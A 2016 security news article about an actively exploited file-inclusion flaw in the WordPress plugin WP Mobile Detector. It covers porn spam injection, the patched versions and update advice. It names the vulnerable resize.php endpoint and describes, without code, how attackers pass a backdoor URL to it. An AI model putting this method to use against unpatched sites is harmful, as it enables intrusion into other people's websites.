2 min read

WordPress users warned of plugin flaw being exploited in porn spam attack

Graham CLULEY

June 03, 2016

WordPress users warned of plugin flaw being exploited in porn spam attack

Tens of thousands of websites running WordPress are thought to have been put at risk from a vulnerability that hackers have been actively exploiting to inject pornographic spam messages.

The problem lies in versions of a WordPress plugin called WP Mobile Detector, which attempts to detect if visitors are browsing a website on a mobile device, and display an appropriate theme for the platform rather than one designed for desktop browsers.

As security researchers at Sucuri report, the zero-day vulnerability in WP Mobile Detector was disclosed by the Plugin Vulnerabilities team at the end of May, a couple of days after the developers were informed of the problem.

Attackers were able to exploit a flaw in the plugin’s code that failed to properly validate and sanitise web input from untrusted sources, allowing anyone to feed malicious PHP code into a vulnerable website.

What raised alarm was the clear ease with which attackers could take advantage of the security hole, typically triggering a payload that allowed attackers to gain remote access, as Douglas Santos of Sucuri explained:

“The vulnerability is very easy to exploit, all the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb, in this case it just includes resize.php), inside the plugin directory with the backdoor URL.”

The makers of WP Mobile Detector removed their vulnerable code from the WordPress plugin directory, while they worked on a fix – but that doesn’t mean, of course, that websites might not have been compromised in the meantime.

Prior to the plugin’s withdrawal from release, it reportedly had more than 10,000+ active installations – and although that figure has seemingly slumped significantly since news of the vulnerability first broke, it’s likely that there are still websites out there at risk of being exploited via the flaw.

Yesterday, a new version of WP Mobile Detector was thankfully released by its developer Websitez which fixes the flaw (version 3.6) – and, at the time of writing, the latest edition is version 3.7.

Of course, a new version of the plugin isn’t much help unless website administrators update their version of the plugin as a matter of priority.

Readers should not that sites running self-hosted versions of WordPress from WordPress.org are different from the many millions of blogs which run on WordPress.com. WordPress.com, run by Automattic, manages the installation of WordPress for you, and looks after security on your behalf.

The flaw described above is only an issue for self-hosted versions of WordPress, running the WP Mobile Detector plugin. Furthermore, it is understood that the vulnerability requires the allow_url_fopen option be enabled on the server to be exploitable.

If you do self-host your WordPress account, you have to acknowledge that security is your responsibility (or find yourself a managed wordpress host who is prepared to take it on for you), as vulnerabilities are often found in the software and its many many third-party plugins.

You can reduce the risk of your own site being compromised by keeping WordPress and its plugins updated, and keeping the number of plugins you use to a minimum.

And while we’re on the topic of confusing names, it’s worth underlining that the issue resides in WP Mobile Detector, not in other WordPress plugins which may have similar names (such as WP Mobile Detect).

And yes, naming can be very confusing in the world of technology. You’re not the only one to think so.

tags


Author



Right now

Top posts

Ultimate Privacy Guide for Your Facebook Account

Ultimate Privacy Guide for Your Facebook Account

August 31, 2021

6 min read
7 Signs It’s Time to Use Parental Controls On Your Family’s Devices

7 Signs It’s Time to Use Parental Controls On Your Family’s Devices

August 27, 2021

2 min read
Your Netflix Account May Be on Sale on Darkweb. Protect It

Your Netflix Account May Be on Sale on Darkweb. Protect It

August 13, 2021

3 min read
E-mails claiming your computer was hacked and your privacy exposed - what you need to know (spoiler: you can relax - they’re bluffing)

E-mails claiming your computer was hacked and your privacy exposed - what you need to know (spoiler: you can relax - they’re bluffing)

July 29, 2021

5 min read
Watch Out for These Ongoing Bank of America Phishing Campaigns Targeting Customers in the US

Watch Out for These Ongoing Bank of America Phishing Campaigns Targeting Customers in the US

July 16, 2021

3 min read
How to protect yourself against cyberstalking

How to protect yourself against cyberstalking

July 06, 2021

2 min read

FOLLOW US ON

SOCIAL MEDIA


You might also like

Romance scammers arrested in Texas for defrauding elderly lonely hearts Romance scammers arrested in Texas for defrauding elderly lonely hearts
Graham CLULEY

September 28, 2021

3 min read
iCloud Private Relay Vulnerability Exposes User IP Addresses, Researchers Find iCloud Private Relay Vulnerability Exposes User IP Addresses, Researchers Find
Silviu STAHIE

September 27, 2021

1 min read
Bitcoin.org Compromised; Attackers Posted “Double Your Money” Announcement Bitcoin.org Compromised; Attackers Posted “Double Your Money” Announcement
Silviu STAHIE

September 27, 2021

1 min read